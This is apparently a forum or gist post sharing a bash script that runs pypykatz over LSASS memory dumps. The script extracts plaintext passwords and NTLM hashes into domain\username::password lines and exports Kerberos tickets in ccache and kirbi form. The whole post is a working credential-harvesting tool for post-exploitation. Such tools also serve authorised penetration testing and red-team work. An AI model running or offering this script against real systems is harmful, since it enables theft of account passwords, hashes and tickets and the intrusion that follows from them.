super rough plaintext secret parser for pypykatz dumps

mymykat.sh

#!/bin/bash
# prereqs: pypykatz, all the dumps in current working dir

mkdir ./ppktz_tickets 2>/dev/null
ext='.dmp'

for i in *$ext; do
    txtfile=${i::-3}txt
    secrets=${i::-3}secrets
    pypykatz lsa minidump $i -o $txtfile -k ./ppktz_tickets/;
    grep 'password' $txtfile -B 2 | grep -v 'None' | grep 'password' -B 1 | sed -e "s#--##g" | sed '/^$/d' | sed '$!N;s/\n/ /' | sed 's/username //g' | sed 's/password /::/g' | tr -d '[:blank:]' | sort -u > $secrets
    grep 'NT:' $txtfile -B 3 | grep -v "LM: NA" | cut -d ":" -f 2,3 | sed -e "s#--##g" | sed '/^$/d' | tr -d '[:blank:]' | sed 's/NT://g' | awk '{ printf "%s", $0; if (NR % 3 == 0) print ""; else printf ":" }' | awk -v OFS=":" -F":" '{print $2, $1, $3}' | sed 's/:/\\/' | sed 's/:/::/' | grep -v "\\\$" | sort -u >> $secrets
    sort -u $secrets -o $secrets
done

# deletes empty secrets files
find ./*.secrets -type f -empty -delete

echo 'plaintext and hash output:' && wc -l *.secrets | grep total
echo 'ccache tickets output:' && /bin/ls -l ./ppktz_tickets/*.ccache | wc -l
echo 'kirbi tickets output' && /bin/ls -l ./ppktz_tickets/*.kirbi | wc -l

takes raw lsass output files, uses pypykatz to output text, greps out plaintext creds and NTLM hashes, then sorts for uniques. includes pypykatz flags to output ccache and kirbi tickets as well.

output format:
domain\username::password